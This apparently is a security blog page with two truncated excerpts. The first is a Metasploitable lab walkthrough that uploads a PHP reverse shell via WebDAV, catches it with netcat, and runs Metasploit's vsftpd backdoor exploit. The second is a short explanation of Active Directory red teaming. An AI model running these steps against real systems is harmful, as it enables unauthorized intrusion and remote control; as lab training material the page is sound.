Cyber Security | Web Development

Attacker Machine(192.168.50.2) - Victim Machine(Metasploitable)- (192.168.50.3) Perform at Attacker Machine: nc 192.168.50.3 80  --> Victim Machine OPTIONS http://192.168.50.3 host:192.168.50.3 OPTIONS http://192.168.50.3/dav/ HTTP/1.0 host:192.168.50.3 Upload php Web Shell: cadaver http://192.168.50.3/dav/ ls /usr/share/webshells/php/ nano /usr/share/webshells/php/php-reverse-shell.php change to ip: attacker machine (192.168.50.2) port: 1234 Upload shell: put /usr/share/webshells/php/php-reverse-shell.php Get Reverse Shell: nc -nlvp 1234 Basic Commands: $ ifconfig $ /sbin/ifconfig Tool: MSFConsole  $ msfconsole $ search vsftpd $ found ==> exploit/unix/ftp/vsftpd_234_backdoor $ use exploit/unix/ftp/vsftpd_234_backdoor $ show options $ set RHOSTS 192.168.50.3 (Victim Machine)  $ set verbose true $ run Get the command shell: whoami It launches a real bash shell through Python by attaching it to a pseudo-terminal, improving interactivity compared to just running /bin/b...

What is Red Teaming? Red teaming in Active Directory is the process of simulating real-world cyberattacks to identify weaknesses in an organization’s AD environment. It focuses on gaining initial access, escalating privileges, and moving laterally to reveal security gaps before real attackers exploit them. Red Teams are divided into 3 Groups: Red teams are typically divided into three groups: Cyber , which tests digital defenses through hacking simulations (e.g., network penetration, AD attacks); Social , which exploits human behavior using tactics like phishing or impersonation; and Physical , which attempts to bypass physical security by tailgating, lockpicking, or accessing restricted areas. Red Team Emulation Emulates (copies) the behavior of a specific real-world threat group—including their tools, techniques, and attack patterns. Example: Acting exactly like APT29, using the same phishing style, malware families, and stealthy lateral movement they are known for. Goal: Test how we...